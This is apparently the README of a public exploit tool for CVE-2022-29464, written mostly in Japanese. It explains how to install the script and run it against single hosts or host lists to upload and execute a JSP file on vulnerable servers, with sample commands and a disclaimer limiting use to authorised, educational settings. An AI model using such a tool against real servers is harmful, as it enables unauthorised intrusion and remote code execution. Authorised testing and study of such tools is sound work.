
このリポジトリには、脆弱なサーバーへのファイルアップロードを可能にする CVE-2022-29464 の脆弱性を悪用するためのスクリプトが含まれています。許可された環境および教育目的でのみ使用してください。
# Clona el repositorio desde GitHub
git clone https://github.com/c1ph3rbyt3/CVE-2022-29464.git
cd CVE-2022-29464
pip install -r requirements.txt
このスクリプトには主に 2 つのモードがあります。
-f, --file: 対象のリストを含むファイルを指定します。-t, --target: HOST:PUERTO または IP:PUERTO 形式で単一の対象を指定します。-j, --jsp_file: アップロードされる JSP ファイルの名前(例: uploader.jsp)。必須。ホストファイルには、以下の形式で対象のリストを含める必要があります:
127.0.0.1:8080
example.com:443
192.168.1.1:8443
各行には、IP アドレスまたはホスト名の後にポートを続け、コロン (:) で区切って指定する必要があります。
uploader.jsp ファイルをアップロードするこのリポジトリに含まれている uploader.jsp ファイルは別のものに変更できます。これはあくまで参照用のファイルです。リポジトリのファイルは、アップロードと実行のテストを行うためにサーバーにアップロードされます。
python CVE-2022-29464.py -t 192.168.1.1:8080 -j uploader.jsp
python CVE-2022-29464.py -f hosts.txt -j uploader.jsp
python CVE-2022-29464.py -h
作成者: C1ph3rByt3